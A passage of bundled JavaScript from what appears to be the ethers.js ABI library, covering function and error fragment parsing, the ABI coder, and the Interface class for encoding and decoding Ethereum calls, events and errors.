        if (typeof value === "string") return $871a765ee5e657d2$export$8d576c928b93668f.fromString(value);
        return $871a765ee5e657d2$export$8d576c928b93668f.fromObject(value);
    }
    static fromObject(value) {
        if ($871a765ee5e657d2$export$8d576c928b93668f.isFunctionFragment(value)) return value;
        if (value.type !== "function") $871a765ee5e657d2$var$logger.throwArgumentError("invalid function object", "value", value);
        let state = $871a765ee5e657d2$var$verifyState(value);
        const params = {
            type: value.type,
            name: $871a765ee5e657d2$var$verifyIdentifier(value.name),
            constant: state.constant,
            inputs: value.inputs ? value.inputs.map($871a765ee5e657d2$export$426dc07f493a4c47.fromObject) : [],
            outputs: value.outputs ? value.outputs.map($871a765ee5e657d2$export$426dc07f493a4c47.fromObject) : [],
            payable: state.payable,
            stateMutability: state.stateMutability,
            gas: value.gas ? (0, $0df4577496dcf693$export$d97aa349ed20696).from(value.gas) : null
        };
        return new $871a765ee5e657d2$export$8d576c928b93668f($871a765ee5e657d2$var$_constructorGuard, params);
    }
    static fromString(value) {
        let params = {
            type: "function"
        };
        value = $871a765ee5e657d2$var$parseGas(value, params);
        let comps = value.split(" returns ");
        if (comps.length > 2) $871a765ee5e657d2$var$logger.throwArgumentError("invalid function string", "value", value);
        let parens = comps[0].match($871a765ee5e657d2$var$regexParen);
        if (!parens) $871a765ee5e657d2$var$logger.throwArgumentError("invalid function signature", "value", value);
        params.name = parens[1].trim();
        if (params.name) $871a765ee5e657d2$var$verifyIdentifier(params.name);
        params.inputs = $871a765ee5e657d2$var$parseParams(parens[2], false);
        $871a765ee5e657d2$var$parseModifiers(parens[3].trim(), params);
        // We have outputs
        if (comps.length > 1) {
            let returns = comps[1].match($871a765ee5e657d2$var$regexParen);
            if (returns[1].trim() != "" || returns[3].trim() != "") $871a765ee5e657d2$var$logger.throwArgumentError("unexpected tokens", "value", value);
            params.outputs = $871a765ee5e657d2$var$parseParams(returns[2], false);
        } else params.outputs = [];
        return $871a765ee5e657d2$export$8d576c928b93668f.fromObject(params);
    }
    static isFunctionFragment(value) {
        return value && value._isFragment && value.type === "function";
    }
}
//export class StructFragment extends Fragment {
//}
function $871a765ee5e657d2$var$checkForbidden(fragment) {
    const sig = fragment.format();
    if (sig === "Error(string)" || sig === "Panic(uint256)") $871a765ee5e657d2$var$logger.throwArgumentError(`cannot specify user defined ${sig} error`, "fragment", fragment);
    return fragment;
}
class $871a765ee5e657d2$export$2c42c6d543aa9b59 extends $871a765ee5e657d2$export$ffb0004e005737fa {
    format(format) {
        if (!format) format = $871a765ee5e657d2$export$f010f239efc4d445.sighash;
        if (!$871a765ee5e657d2$export$f010f239efc4d445[format]) $871a765ee5e657d2$var$logger.throwArgumentError("invalid format type", "format", format);
        if (format === $871a765ee5e657d2$export$f010f239efc4d445.json) return JSON.stringify({
            type: "error",
            name: this.name,
            inputs: this.inputs.map((input)=>JSON.parse(input.format(format)))
        });
        let result = "";
        if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) result += "error ";
        result += this.name + "(" + this.inputs.map((input)=>input.format(format)).join(format === $871a765ee5e657d2$export$f010f239efc4d445.full ? ", " : ",") + ") ";
        return result.trim();
    }
    static from(value) {
        if (typeof value === "string") return $871a765ee5e657d2$export$2c42c6d543aa9b59.fromString(value);
        return $871a765ee5e657d2$export$2c42c6d543aa9b59.fromObject(value);
    }
    static fromObject(value) {
        if ($871a765ee5e657d2$export$2c42c6d543aa9b59.isErrorFragment(value)) return value;
        if (value.type !== "error") $871a765ee5e657d2$var$logger.throwArgumentError("invalid error object", "value", value);
        const params = {
            type: value.type,
            name: $871a765ee5e657d2$var$verifyIdentifier(value.name),
            inputs: value.inputs ? value.inputs.map($871a765ee5e657d2$export$426dc07f493a4c47.fromObject) : []
        };
        return $871a765ee5e657d2$var$checkForbidden(new $871a765ee5e657d2$export$2c42c6d543aa9b59($871a765ee5e657d2$var$_constructorGuard, params));
    }
    static fromString(value) {
        let params = {
            type: "error"
        };
        let parens = value.match($871a765ee5e657d2$var$regexParen);
        if (!parens) $871a765ee5e657d2$var$logger.throwArgumentError("invalid error signature", "value", value);
        params.name = parens[1].trim();
        if (params.name) $871a765ee5e657d2$var$verifyIdentifier(params.name);
        params.inputs = $871a765ee5e657d2$var$parseParams(parens[2], false);
        return $871a765ee5e657d2$var$checkForbidden($871a765ee5e657d2$export$2c42c6d543aa9b59.fromObject(params));
    }
    static isErrorFragment(value) {
        return value && value._isFragment && value.type === "error";
    }
}
function $871a765ee5e657d2$var$verifyType(type) {
    // These need to be transformed to their full description
    if (type.match(/^uint($|[^1-9])/)) type = "uint256" + type.substring(4);
    else if (type.match(/^int($|[^1-9])/)) type = "int256" + type.substring(3);
    // @TODO: more verification
    return type;
}
// See: https://github.com/ethereum/solidity/blob/1f8f1a3db93a548d0555e3e14cfc55a10e25b60e/docs/grammar/SolidityLexer.g4#L234
const $871a765ee5e657d2$var$regexIdentifier = new RegExp("^[a-zA-Z$_][a-zA-Z0-9$_]*$");
function $871a765ee5e657d2$var$verifyIdentifier(value) {
    if (!value || !value.match($871a765ee5e657d2$var$regexIdentifier)) $871a765ee5e657d2$var$logger.throwArgumentError(`invalid identifier "${value}"`, "value", value);
    return value;
}
const $871a765ee5e657d2$var$regexParen = new RegExp("^([^)(]*)\\((.*)\\)([^)(]*)$");
function $871a765ee5e657d2$var$splitNesting(value) {
    value = value.trim();
    let result = [];
    let accum = "";
    let depth = 0;
    for(let offset = 0; offset < value.length; offset++){
        let c = value[offset];
        if (c === "," && depth === 0) {
            result.push(accum);
            accum = "";
        } else {
            accum += c;
            if (c === "(") depth++;
            else if (c === ")") {
                depth--;
                if (depth === -1) $871a765ee5e657d2$var$logger.throwArgumentError("unbalanced parenthesis", "value", value);
            }
        }
    }
    if (accum) result.push(accum);
    return result;
}


"use strict";
const $2f97e4c6f3904f5b$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $7b99b6039539a6c4$export$83d89fbfd8236492));
const $2f97e4c6f3904f5b$var$paramTypeBytes = new RegExp(/^bytes([0-9]*)$/);
const $2f97e4c6f3904f5b$var$paramTypeNumber = new RegExp(/^(u?int)([0-9]*)$/);
class $2f97e4c6f3904f5b$export$fe041e1a83d3efc6 {
    constructor(coerceFunc){
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "coerceFunc", coerceFunc || null);
    }
    _getCoder(param) {
        switch(param.baseType){
            case "address":
                return new (0, $22f6893c208a0a4e$export$59dbbded7775bfe7)(param.name);
            case "bool":
                return new (0, $394fcd7db865fb3c$export$fe9118d6c093150c)(param.name);
            case "string":
                return new (0, $90994e88a8e0b05b$export$2d1b854518731426)(param.name);
            case "bytes":
                return new (0, $6e254db4e73082b7$export$e5823e9574df18d2)(param.name);
            case "array":
                return new (0, $a30effb870f18115$export$88bc419d2df11f54)(this._getCoder(param.arrayChildren), param.arrayLength, param.name);
            case "tuple":
                return new (0, $c633d82d9fdfc710$export$e9fceba8f110fea6)((param.components || []).map((component)=>{
                    return this._getCoder(component);
                }), param.name);
            case "":
                return new (0, $8815781d2f2dcc92$export$70982cadf2d6b4ec)(param.name);
        }
        // u?int[0-9]*
        let match = param.type.match($2f97e4c6f3904f5b$var$paramTypeNumber);
        if (match) {
            let size = parseInt(match[2] || "256");
            if (size === 0 || size > 256 || size % 8 !== 0) $2f97e4c6f3904f5b$var$logger.throwArgumentError("invalid " + match[1] + " bit length", "param", param);
            return new (0, $f9cce4408e3f228e$export$b934dc8cfe13938c)(size / 8, match[1] === "int", param.name);
        }
        // bytes[0-9]+
        match = param.type.match($2f97e4c6f3904f5b$var$paramTypeBytes);
        if (match) {
            let size = parseInt(match[1]);
            if (size === 0 || size > 32) $2f97e4c6f3904f5b$var$logger.throwArgumentError("invalid bytes length", "param", param);
            return new (0, $9c7ee045e883fffe$export$7dec9db68e6bcf5a)(size, param.name);
        }
        return $2f97e4c6f3904f5b$var$logger.throwArgumentError("invalid type", "type", param.type);
    }
    _getWordSize() {
        return 32;
    }
    _getReader(data, allowLoose) {
        return new (0, $2c0f0ed4c5bed241$export$2f7a2f0e90c07dc4)(data, this._getWordSize(), this.coerceFunc, allowLoose);
    }
    _getWriter() {
        return new (0, $2c0f0ed4c5bed241$export$d7a960146e1a269e)(this._getWordSize());
    }
    getDefaultValue(types) {
        const coders = types.map((type)=>this._getCoder((0, $871a765ee5e657d2$export$426dc07f493a4c47).from(type)));
        const coder = new (0, $c633d82d9fdfc710$export$e9fceba8f110fea6)(coders, "_");
        return coder.defaultValue();
    }
    encode(types, values) {
        if (types.length !== values.length) $2f97e4c6f3904f5b$var$logger.throwError("types/values length mismatch", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.INVALID_ARGUMENT, {
            count: {
                types: types.length,
                values: values.length
            },
            value: {
                types: types,
                values: values
            }
        });
        const coders = types.map((type)=>this._getCoder((0, $871a765ee5e657d2$export$426dc07f493a4c47).from(type)));
        const coder = new (0, $c633d82d9fdfc710$export$e9fceba8f110fea6)(coders, "_");
        const writer = this._getWriter();
        coder.encode(writer, values);
        return writer.data;
    }
    decode(types, data, loose) {
        const coders = types.map((type)=>this._getCoder((0, $871a765ee5e657d2$export$426dc07f493a4c47).from(type)));
        const coder = new (0, $c633d82d9fdfc710$export$e9fceba8f110fea6)(coders, "_");
        return coder.decode(this._getReader((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data), loose));
    }
}
const $2f97e4c6f3904f5b$export$51d1cfcdb913adff = new $2f97e4c6f3904f5b$export$fe041e1a83d3efc6();






"use strict";
const $ef97d5c3a9a93354$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $7b99b6039539a6c4$export$83d89fbfd8236492));
class $ef97d5c3a9a93354$export$c2ab6499be98b3c5 extends (0, $a463a6b5f08d6875$exports.Description) {
}
class $ef97d5c3a9a93354$export$7a3223b0fadb690b extends (0, $a463a6b5f08d6875$exports.Description) {
}
class $ef97d5c3a9a93354$export$cfba08fc0e40e2ab extends (0, $a463a6b5f08d6875$exports.Description) {
}
class $ef97d5c3a9a93354$export$8ef99100a3c56f8c extends (0, $a463a6b5f08d6875$exports.Description) {
    static isIndexed(value) {
        return !!(value && value._isIndexed);
    }
}
const $ef97d5c3a9a93354$var$BuiltinErrors = {
    "0x08c379a0": {
        signature: "Error(string)",
        name: "Error",
        inputs: [
            "string"
        ],
        reason: true
    },
    "0x4e487b71": {
        signature: "Panic(uint256)",
        name: "Panic",
        inputs: [
            "uint256"
        ]
    }
};
function $ef97d5c3a9a93354$var$wrapAccessError(property, error) {
    const wrap = new Error(`deferred error during ABI decoding triggered accessing ${property}`);
    wrap.error = error;
    return wrap;
}
class $ef97d5c3a9a93354$export$48cefb51a4e315b2 {
    constructor(fragments){
        let abi = [];
        if (typeof fragments === "string") abi = JSON.parse(fragments);
        else abi = fragments;
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "fragments", abi.map((fragment)=>{
            return (0, $871a765ee5e657d2$export$ffb0004e005737fa).from(fragment);
        }).filter((fragment)=>fragment != null));
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "_abiCoder", (0, $a463a6b5f08d6875$exports.getStatic)(new.target, "getAbiCoder")());
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "functions", {});
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "errors", {});
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "events", {});
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "structs", {});
        // Add all fragments by their signature
        this.fragments.forEach((fragment)=>{
            let bucket = null;
            switch(fragment.type){
                case "constructor":
                    if (this.deploy) {
                        $ef97d5c3a9a93354$var$logger.warn("duplicate definition - constructor");
                        return;
                    }
                    //checkNames(fragment, "input", fragment.inputs);
                    (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "deploy", fragment);
                    return;
                case "function":
                    //checkNames(fragment, "input", fragment.inputs);
                    //checkNames(fragment, "output", (<FunctionFragment>fragment).outputs);
                    bucket = this.functions;
                    break;
                case "event":
                    //checkNames(fragment, "input", fragment.inputs);
                    bucket = this.events;
                    break;
                case "error":
                    bucket = this.errors;
                    break;
                default:
                    return;
            }
            let signature = fragment.format();
            if (bucket[signature]) {
                $ef97d5c3a9a93354$var$logger.warn("duplicate definition - " + signature);
                return;
            }
            bucket[signature] = fragment;
        });
        // If we do not have a constructor add a default
        if (!this.deploy) (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "deploy", (0, $871a765ee5e657d2$export$3ac5c9504f801ea4).from({
            payable: false,
            type: "constructor"
        }));
        (0, $a463a6b5f08d6875$exports.defineReadOnly)(this, "_isInterface", true);
    }
    format(format) {
        if (!format) format = (0, $871a765ee5e657d2$export$f010f239efc4d445).full;
        if (format === (0, $871a765ee5e657d2$export$f010f239efc4d445).sighash) $ef97d5c3a9a93354$var$logger.throwArgumentError("interface does not support formatting sighash", "format", format);
        const abi = this.fragments.map((fragment)=>fragment.format(format));
        // We need to re-bundle the JSON fragments a bit
        if (format === (0, $871a765ee5e657d2$export$f010f239efc4d445).json) return JSON.stringify(abi.map((j)=>JSON.parse(j)));
        return abi;
    }
    // Sub-classes can override these to handle other blockchains
    static getAbiCoder() {
        return 0, $2f97e4c6f3904f5b$export$51d1cfcdb913adff;
    }
    static getAddress(address) {
        return (0, $8aee8aee2d40605d$export$88411125f012957a)(address);
    }
    static getSighash(fragment) {
        return (0, $7b88b6e03e4708f2$export$15da666eba198c18)((0, $7cd0a9996bd6b341$export$d560c7e4a29451c2)(fragment.format()), 0, 4);
    }
    static getEventTopic(eventFragment) {
        return (0, $7cd0a9996bd6b341$export$d560c7e4a29451c2)(eventFragment.format());
    }
    // Find a function definition by any means necessary (unless it is ambiguous)
    getFunction(nameOrSignatureOrSighash) {
        if ((0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(nameOrSignatureOrSighash)) {
            for(const name in this.functions){
                if (nameOrSignatureOrSighash === this.getSighash(name)) return this.functions[name];
            }
            $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching function", "sighash", nameOrSignatureOrSighash);
        }
        // It is a bare name, look up the function (will return null if ambiguous)
        if (nameOrSignatureOrSighash.indexOf("(") === -1) {
            const name = nameOrSignatureOrSighash.trim();
            const matching = Object.keys(this.functions).filter((f)=>f.split("(" /* fix:) */ )[0] === name);
            if (matching.length === 0) $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching function", "name", name);
            else if (matching.length > 1) $ef97d5c3a9a93354$var$logger.throwArgumentError("multiple matching functions", "name", name);
            return this.functions[matching[0]];
        }
        // Normalize the signature and lookup the function
        const result = this.functions[(0, $871a765ee5e657d2$export$8d576c928b93668f).fromString(nameOrSignatureOrSighash).format()];
        if (!result) $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching function", "signature", nameOrSignatureOrSighash);
        return result;
    }
    // Find an event definition by any means necessary (unless it is ambiguous)
    getEvent(nameOrSignatureOrTopic) {
        if ((0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(nameOrSignatureOrTopic)) {
            const topichash = nameOrSignatureOrTopic.toLowerCase();
            for(const name in this.events){
                if (topichash === this.getEventTopic(name)) return this.events[name];
            }
            $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching event", "topichash", topichash);
        }
        // It is a bare name, look up the function (will return null if ambiguous)
        if (nameOrSignatureOrTopic.indexOf("(") === -1) {
            const name = nameOrSignatureOrTopic.trim();
            const matching = Object.keys(this.events).filter((f)=>f.split("(" /* fix:) */ )[0] === name);
            if (matching.length === 0) $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching event", "name", name);
            else if (matching.length > 1) $ef97d5c3a9a93354$var$logger.throwArgumentError("multiple matching events", "name", name);
            return this.events[matching[0]];
        }
        // Normalize the signature and lookup the function
        const result = this.events[(0, $871a765ee5e657d2$export$958548f08bac2833).fromString(nameOrSignatureOrTopic).format()];
        if (!result) $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching event", "signature", nameOrSignatureOrTopic);
        return result;
    }
    // Find a function definition by any means necessary (unless it is ambiguous)
    getError(nameOrSignatureOrSighash) {
        if ((0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(nameOrSignatureOrSighash)) {
            const getSighash = (0, $a463a6b5f08d6875$exports.getStatic)(this.constructor, "getSighash");
            for(const name in this.errors){
                const error = this.errors[name];
                if (nameOrSignatureOrSighash === getSighash(error)) return this.errors[name];
            }
            $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching error", "sighash", nameOrSignatureOrSighash);
        }
        // It is a bare name, look up the function (will return null if ambiguous)
        if (nameOrSignatureOrSighash.indexOf("(") === -1) {
            const name = nameOrSignatureOrSighash.trim();
            const matching = Object.keys(this.errors).filter((f)=>f.split("(" /* fix:) */ )[0] === name);
            if (matching.length === 0) $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching error", "name", name);
            else if (matching.length > 1) $ef97d5c3a9a93354$var$logger.throwArgumentError("multiple matching errors", "name", name);
            return this.errors[matching[0]];
        }
        // Normalize the signature and lookup the function
        const result = this.errors[(0, $871a765ee5e657d2$export$8d576c928b93668f).fromString(nameOrSignatureOrSighash).format()];
        if (!result) $ef97d5c3a9a93354$var$logger.throwArgumentError("no matching error", "signature", nameOrSignatureOrSighash);
        return result;
    }
    // Get the sighash (the bytes4 selector) used by Solidity to identify a function
    getSighash(fragment) {
        if (typeof fragment === "string") try {
            fragment = this.getFunction(fragment);
        } catch (error) {
            try {
                fragment = this.getError(fragment);
            } catch (_) {
                throw error;
            }
        }
        return (0, $a463a6b5f08d6875$exports.getStatic)(this.constructor, "getSighash")(fragment);
    }
    // Get the topic (the bytes32 hash) used by Solidity to identify an event
    getEventTopic(eventFragment) {
        if (typeof eventFragment === "string") eventFragment = this.getEvent(eventFragment);
        return (0, $a463a6b5f08d6875$exports.getStatic)(this.constructor, "getEventTopic")(eventFragment);
    }
    _decodeParams(params, data) {
        return this._abiCoder.decode(params, data);
    }
    _encodeParams(params, values) {
        return this._abiCoder.encode(params, values);
    }
    encodeDeploy(values) {
        return this._encodeParams(this.deploy.inputs, values || []);
    }
    decodeErrorResult(fragment, data) {
        if (typeof fragment === "string") fragment = this.getError(fragment);
        const bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data);
        if ((0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(bytes.slice(0, 4)) !== this.getSighash(fragment)) $ef97d5c3a9a93354$var$logger.throwArgumentError(`data signature does not match error ${fragment.name}.`, "data", (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(bytes));
        return this._decodeParams(fragment.inputs, bytes.slice(4));
    }
    encodeErrorResult(fragment, values) {
        if (typeof fragment === "string") fragment = this.getError(fragment);
        return (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)((0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)([
            this.getSighash(fragment),
            this._encodeParams(fragment.inputs, values || [])
        ]));
    }
    // Decode the data for a function call (e.g. tx.data)
    decodeFunctionData(functionFragment, data) {
        if (typeof functionFragment === "string") functionFragment = this.getFunction(functionFragment);
        const bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data);
        if ((0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(bytes.slice(0, 4)) !== this.getSighash(functionFragment)) $ef97d5c3a9a93354$var$logger.throwArgumentError(`data signature does not match function ${functionFragment.name}.`, "data", (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(bytes));
        return this._decodeParams(functionFragment.inputs, bytes.slice(4));
    }
    // Encode the data for a function call (e.g. tx.data)
    encodeFunctionData(functionFragment, values) {
        if (typeof functionFragment === "string") functionFragment = this.getFunction(functionFragment);
        return (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)((0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)([
            this.getSighash(functionFragment),
            this._encodeParams(functionFragment.inputs, values || [])
        ]));
    }
    // Decode the result from a function call (e.g. from eth_call)
    decodeFunctionResult(functionFragment, data) {
        if (typeof functionFragment === "string") functionFragment = this.getFunction(functionFragment);
        let bytes = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data);
        let reason = null;
        let message = "";
        let errorArgs = null;
        let errorName = null;
        let errorSignature = null;
        switch(bytes.length % this._abiCoder._getWordSize()){
            case 0:
                try {
                    return this._abiCoder.decode(functionFragment.outputs, bytes);
                } catch (error) {}
                break;
            case 4:
                {
                    const selector = (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(bytes.slice(0, 4));
                    const builtin = $ef97d5c3a9a93354$var$BuiltinErrors[selector];
                    if (builtin) {
                        errorArgs = this._abiCoder.decode(builtin.inputs, bytes.slice(4));
                        errorName = builtin.name;
                        errorSignature = builtin.signature;
                        if (builtin.reason) reason = errorArgs[0];
                        if (errorName === "Error") message = `; VM Exception while processing transaction: reverted with reason string ${JSON.stringify(errorArgs[0])}`;
                        else if (errorName === "Panic") message = `; VM Exception while processing transaction: reverted with panic code ${errorArgs[0]}`;
                    } else try {
                        const error = this.getError(selector);
                        errorArgs = this._abiCoder.decode(error.inputs, bytes.slice(4));
                        errorName = error.name;
                        errorSignature = error.format();
                    } catch (error) {}
                    break;
                }
        }
        return $ef97d5c3a9a93354$var$logger.throwError("call revert exception" + message, (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.CALL_EXCEPTION, {
            method: functionFragment.format(),
            data: (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(data),
            errorArgs: errorArgs,
            errorName: errorName,
            errorSignature: errorSignature,
            reason: reason
        });
    }
    // Encode the result for a function call (e.g. for eth_call)
    encodeFunctionResult(functionFragment, values) {
        if (typeof functionFragment === "string") functionFragment = this.getFunction(functionFragment);
        return (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(this._abiCoder.encode(functionFragment.outputs, values || []));
    }
    // Create the filter for the event with search criteria (e.g. for eth_filterLog)
    encodeFilterTopics(eventFragment, values) {
        if (typeof eventFragment === "string") eventFragment = this.getEvent(eventFragment);
        if (values.length > eventFragment.inputs.length) $ef97d5c3a9a93354$var$logger.throwError("too many arguments for " + eventFragment.format(), (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNEXPECTED_ARGUMENT, {
            argument: "values",
            value: values
        });
        let topics = [];
        if (!eventFragment.anonymous) topics.push(this.getEventTopic(eventFragment));
        const encodeTopic = (param, value)=>{
            if (param.type === "string") return (0, $7cd0a9996bd6b341$export$d560c7e4a29451c2)(value);
            else if (param.type === "bytes") return (0, $1dbc6131e27af3ca$export$f8151fce47ad1c35)((0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(value));
            if (param.type === "bool" && typeof value === "boolean") value = value ? "0x01" : "0x00";
            if (param.type.match(/^u?int/)) value = (0, $0df4577496dcf693$export$d97aa349ed20696).from(value).toHexString();
            // Check addresses are valid
            if (param.type === "address") this._abiCoder.encode([
                "address"
            ], [
                value
            ]);
            return (0, $7b88b6e03e4708f2$export$e9c46a54370b47e8)((0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(value), 32);
        };
        values.forEach((value, index)=>{
            let param = eventFragment.inputs[index];
            if (!param.indexed) {
                if (value != null) $ef97d5c3a9a93354$var$logger.throwArgumentError("cannot filter non-indexed parameters; must be null", "contract." + param.name, value);
                return;
            }
            if (value == null) topics.push(null);
            else if (param.baseType === "array" || param.baseType === "tuple") $ef97d5c3a9a93354$var$logger.throwArgumentError("filtering with tuples or arrays not supported", "contract." + param.name, value);
            else if (Array.isArray(value)) topics.push(value.map((value)=>encodeTopic(param, value)));
            else topics.push(encodeTopic(param, value));
        });
        // Trim off trailing nulls
        while(topics.length && topics[topics.length - 1] === null)topics.pop();
        return topics;
    }
    encodeEventLog(eventFragment, values) {
        if (typeof eventFragment === "string") eventFragment = this.getEvent(eventFragment);
        const topics = [];
        const dataTypes = [];
        const dataValues = [];
        if (!eventFragment.anonymous) topics.push(this.getEventTopic(eventFragment));
        if (values.length !== eventFragment.inputs.length) $ef97d5c3a9a93354$var$logger.throwArgumentError("event arguments/values mismatch", "values", values);
        eventFragment.inputs.forEach((param, index)=>{
            const value = values[index];
            if (param.indexed) {
                if (param.type === "string") topics.push((0, $7cd0a9996bd6b341$export$d560c7e4a29451c2)(value));
                else if (param.type === "bytes") topics.push((0, $1dbc6131e27af3ca$export$f8151fce47ad1c35)(value));
                else if (param.baseType === "tuple" || param.baseType === "array") // @TODO
                throw new Error("not implemented");
                else topics.push(this._abiCoder.encode([
                    param.type
                ], [
                    value
                ]));
            } else {
                dataTypes.push(param);
                dataValues.push(value);
            }
        });
        return {
            data: this._abiCoder.encode(dataTypes, dataValues),
            topics: topics
        };
    }
    // Decode a filter for the event and the search criteria
    decodeEventLog(eventFragment, data, topics) {
        if (typeof eventFragment === "string") eventFragment = this.getEvent(eventFragment);
        if (topics != null && !eventFragment.anonymous) {
            let topicHash = this.getEventTopic(eventFragment);
            if (!(0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(topics[0], 32) || topics[0].toLowerCase() !== topicHash) $ef97d5c3a9a93354$var$logger.throwError("fragment/topic mismatch", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.INVALID_ARGUMENT, {
                argument: "topics[0]",
                expected: topicHash,
                value: topics[0]
            });
            topics = topics.slice(1);
        }
        let indexed = [];
        let nonIndexed = [];
        let dynamic = [];
        eventFragment.inputs.forEach((param, index)=>{
            if (param.indexed) {
                if (param.type === "string" || param.type === "bytes" || param.baseType === "tuple" || param.baseType === "array") {
                    indexed.push((0, $871a765ee5e657d2$export$426dc07f493a4c47).fromObject({
                        type: "bytes32",
                        name: param.name
                    }));
                    dynamic.push(true);
                } else {
                    indexed.push(param);
                    dynamic.push(false);
                }
            } else {
                nonIndexed.push(param);
                dynamic.push(false);
            }
        });
        let resultIndexed = topics != null ? this._abiCoder.decode(indexed, (0, $7b88b6e03e4708f2$export$ee1b3e54f0441b22)(topics)) : null;
        let resultNonIndexed = this._abiCoder.decode(nonIndexed, data, true);
        let result = [];
        let nonIndexedIndex = 0, indexedIndex = 0;
        eventFragment.inputs.forEach((param, index)=>{
            if (param.indexed) {
                if (resultIndexed == null) result[index] = new $ef97d5c3a9a93354$export$8ef99100a3c56f8c({
                    _isIndexed: true,
                    hash: null
                });
                else if (dynamic[index]) result[index] = new $ef97d5c3a9a93354$export$8ef99100a3c56f8c({
                    _isIndexed: true,
                    hash: resultIndexed[indexedIndex++]
                });
                else try {
                    result[index] = resultIndexed[indexedIndex++];
                } catch (error) {
                    result[index] = error;
                }
            } else try {
                result[index] = resultNonIndexed[nonIndexedIndex++];
            } catch (error) {
                result[index] = error;
            }
            // Add the keyword argument if named and safe
            if (param.name && result[param.name] == null) {
                const value = result[index];
                // Make error named values throw on access
                if (value instanceof Error) Object.defineProperty(result, param.name, {
                    enumerable: true,
                    get: ()=>{
                        throw $ef97d5c3a9a93354$var$wrapAccessError(`property ${JSON.stringify(param.name)}`, value);
                    }
                });
                else result[param.name] = value;
            }
        });
        // Make all error indexed values throw on access
        for(let i = 0; i < result.length; i++){
            const value = result[i];
            if (value instanceof Error) Object.defineProperty(result, i, {
                enumerable: true,
                get: ()=>{
                    throw $ef97d5c3a9a93354$var$wrapAccessError(`index ${i}`, value);
                }
            });
        }
        return Object.freeze(result);
    }
    // Given a transaction, find the matching function fragment (if any) and
    // determine all its properties and call parameters
    parseTransaction(tx) {
        let fragment = this.getFunction(tx.data.substring(0, 10).toLowerCase());
        if (!fragment) return null;
        return new $ef97d5c3a9a93354$export$7a3223b0fadb690b({
            args: this._abiCoder.decode(fragment.inputs, "0x" + tx.data.substring(10)),
            functionFragment: fragment,
            name: fragment.name,
            signature: fragment.format(),
            sighash: this.getSighash(fragment),
            value: (0, $0df4577496dcf693$export$d97aa349ed20696).from(tx.value || "0")
        });
    }
    // @TODO
    //parseCallResult(data: BytesLike): ??
    // Given an event log, find the matching event fragment (if any) and
    // determine all its properties and values
    parseLog(log) {
        let fragment = this.getEvent(log.topics[0]);
        if (!fragment || fragment.anonymous) return null;
        // @TODO: If anonymous, and the only method, and the input count matches, should we parse?
        //        Probably not, because just because it is the only event in the ABI does
        //        not mean we have the full ABI; maybe just a fragment?
        return new $ef97d5c3a9a93354$export$c2ab6499be98b3c5({
            eventFragment: fragment,
            name: fragment.name,
            signature: fragment.format(),
            topic: this.getEventTopic(fragment),
            args: this.decodeEventLog(fragment, log.data, log.topics)
        });
    }
    parseError(data) {
        const hexData = (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(data);
        let fragment = this.getError(hexData.substring(0, 10).toLowerCase());
        if (!fragment) return null;
        return new $ef97d5c3a9a93354$export$cfba08fc0e40e2ab({
            args: this._abiCoder.decode(fragment.inputs, "0x" + hexData.substring(10)),
            errorFragment: fragment,
            name: fragment.name,
            signature: fragment.format(),
            sighash: this.getSighash(fragment)
        });
    }
    /*
    static from(value: Array<Fragment | string | JsonAbi> | string | Interface) {
        if (Interface.isInterface(value)) {
            return value;
        }
        if (typeof(value) === "string") {
            return new Interface(JSON.parse(value));
        }
        return new Interface(value);
    }
    */ static isInterface(value) {
        return !!(value && value._isInterface);
    }
}


/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
